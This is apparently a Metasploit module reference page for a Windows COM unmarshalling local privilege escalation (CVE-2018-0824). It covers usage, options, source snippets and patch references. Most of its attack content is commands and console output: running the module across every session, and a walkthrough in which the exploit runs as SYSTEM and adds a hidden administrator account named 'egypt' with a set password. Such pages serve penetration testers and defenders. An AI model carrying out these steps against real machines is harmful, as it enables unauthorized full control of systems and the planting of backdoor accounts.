Windows unmarshal post exploitation - Metasploit
This page contains detailed information about how to use the post/windows/escalate/unmarshal_cmd_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows unmarshal post exploitation
Module: post/windows/escalate/unmarshal_cmd_exec
Source code: modules/post/windows/escalate/unmarshal_cmd_exec.rb
Disclosure date: 2018-08-05
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-0824
This module exploits a local privilege escalation bug which exists in microsoft COM for windows when it fails to properly handle serialized objects.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/escalate/unmarshal_cmd_exec
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/escalate/unmarshal_cmd_exec
msf post(unmarshal_cmd_exec) > show options
... show and set options ...
msf post(unmarshal_cmd_exec) > set SESSION session-id
msf post(unmarshal_cmd_exec) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/escalate/unmarshal_cmd_exec")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects.
- https://www.phpmyadmin.net/downloads/
- https://github.com/codewhitesec/UnmarshalPwn/
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
Limitations
The payload will not spawn ant independent session it simply creates process with the system privilege. If the system is not vulnerable, then payload will execute but new process will not spawn.
Verification Steps
If you want to confirm the vulnerability before you add user or perform any other sensitive action.
set COMMAND /s notepad.exe
run
Confirmation:
Then go to meterpreter session and confirm running process (ps) If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system.
Options
COMMAND
This command will be executed on successful escalation.</br>
Scenarios
Windows 10 (Build 15063)
meterpreter > sysinfo
Computer : WIN10X64-1703
OS : Windows 10 (Build 15063).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > execute -f cmd.exe -i -H
Process 4868 created.
Channel 7 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>exit
exit
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/escalate/unmarshal_cmd_exec) > show options
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add ).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt'
command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true
verbose => true
msf5 post(windows/escalate/unmarshal_cmd_exec) > run
[!] SESSION may not be compatible with this module.
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1
[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt
[*] script_template_data.length = 306
[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target
[*] Script uploaded successfully
[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] Launching Exploit...
[*] Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[+] Exploit Completed
[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe
[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting...
[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct
[*] Post module execution completed
msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 1780 created.
Channel 11 created.
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\msfuser\Downloads>net user
net user
User accounts for \\WIN10X64-1703
-------------------------------------------------------------------------------
Administrator DefaultAccount egypt
Guest msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
egypt
msfuser
The command completed successfully.
C:\Users\msfuser\Downloads>
Go back to menu.
Msfconsole Usage
Here is how the windows/escalate/unmarshal_cmd_exec post exploitation module looks in the msfconsole:
msf6 > use post/windows/escalate/unmarshal_cmd_exec
msf6 post(windows/escalate/unmarshal_cmd_exec) > show info
Name: Windows unmarshal post exploitation
Module: post/windows/escalate/unmarshal_cmd_exec
Platform: Windows
Arch: x64
Rank: Normal
Disclosed: 2018-08-05
Provided by:
Nicolas Joly
Matthias Kaiser
Sanjay Gondaliya
Pratik Shah <[email protected]>
Compatible session types:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
Description:
This module exploits a local privilege escalation bug which exists
in microsoft COM for windows when it fails to properly handle
serialized objects.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-0824
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn
https://www.exploit-db.com/exploits/44906
Module Options
This is a complete list of options available in the windows/escalate/unmarshal_cmd_exec post exploitation module:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show options
Module options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add <user>).
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
PATH no Path to write binaries (%TEMP% by default).
SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default).
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/escalate/unmarshal_cmd_exec post exploitation module:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show advanced
Module advanced options (post/windows/escalate/unmarshal_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/escalate/unmarshal_cmd_exec module can do:
msf6 post(windows/escalate/unmarshal_cmd_exec) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/escalate/unmarshal_cmd_exec post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/escalate/unmarshal_cmd_exec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PATH> does not exist on the target
Here is a relevant code snippet related to the "<PATH> does not exist on the target" error message:
80: end
81: end
82:
83: def validate_remote_path(path)
84: unless directory?(path)
85: fail_with(Failure::Unreachable, "#{path} does not exist on the target")
86: end
87: end
88:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
Exploit code is 64-bit only
Here is a relevant code snippet related to the "Exploit code is 64-bit only" error message:
86: end
87: end
88:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
91: fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
92: end
93: if sysinfo['OS'] =~ /XP/
94: fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
95: end
96: end
The exploit binary does not support Windows XP
Here is a relevant code snippet related to the "The exploit binary does not support Windows XP" error message:
89: def validate_target
90: if sysinfo['Architecture'] == ARCH_X86
91: fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
92: end
93: if sysinfo['OS'] =~ /XP/
94: fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
95: end
96: end
97:
98: def ensure_clean_destination(path)
99: if file?(path)
Unable to delete <PATH>
Here is a relevant code snippet related to the "Unable to delete <PATH>" error message:
101: begin
102: file_rm(path)
103: print_status("Deleted #{path}")
104: rescue Rex::Post::Meterpreter::RequestError => e
105: elog(e)
106: print_error("Unable to delete #{path}")
107: end
108: end
109: end
110:
111: def upload_exploit
Failed to substitute command in script_template
Here is a relevant code snippet related to the "Failed to substitute command in script_template" error message:
121: vprint_status("script_template_data.length = #{script_template_data.length}")
122: full_command = 'cmd.exe /c ' + cmd_to_run
123: full_command = full_command
124: script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
125: if script_data == nil
126: fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
127: end
128: vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
129: write_file(script_path, script_data)
130: vprint_status('Script uploaded successfully')
131: end
Command failed, cleaning up
Here is a relevant code snippet related to the "Command failed, cleaning up" error message:
154: vprint_status(command_output)
155: print_good('Exploit Completed')
156: ensure_clean_destination(exploit_path)
157: ensure_clean_destination(script_path)
158: rescue Rex::Post::Meterpreter::RequestError => e
159: elog('Command failed, cleaning up', error: e)
160: print_good('Command failed, cleaning up')
161: print_error(e.message)
162: ensure_clean_destination(exploit_path)
163: ensure_clean_destination(script_path)
164: end
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13608 Merged Pull Request: Standardise Error Logging
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #10561 Merged Pull Request: Windows local privilege escalation - CVE-2018-0824
References
- CVE-2018-0824
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
- https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn
- EDB-44906
See Also
Check also the following modules related to this module:
- post/windows/escalate/droplnk
- post/windows/escalate/getsystem
- post/windows/escalate/golden_ticket
- post/windows/escalate/ms10_073_kbdlayout
- post/windows/escalate/screen_unlock
Related Nessus plugins:
- KB4103716: Windows 10 May 2018 Security Update
- KB4103712: Windows 7 and Windows Server 2008 R2 May 2018 Security Update
- KB4103721: Windows 10 Version 1803 and Windows Server Version 1803 May 2018 Security Update
- KB4103723: Windows 10 Version 1607 and Windows Server 2016 May 2018 Security Update
- KB4103715: Windows 8.1 and Windows Server 2012 R2 May 2018 Security Update
- KB4103727: Windows 10 Version 1709 and Windows Server Version 1709 May 2018 Security Update
- KB4103726: Windows Server 2012 May 2018 Security Update
- KB4103731: Windows 10 Version 1703 May 2018 Security Update
- Security Updates for Windows Server 2008 (May 2018)
Authors
- Nicolas Joly
- Matthias Kaiser
- Sanjay Gondaliya
- Pratik Shah <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.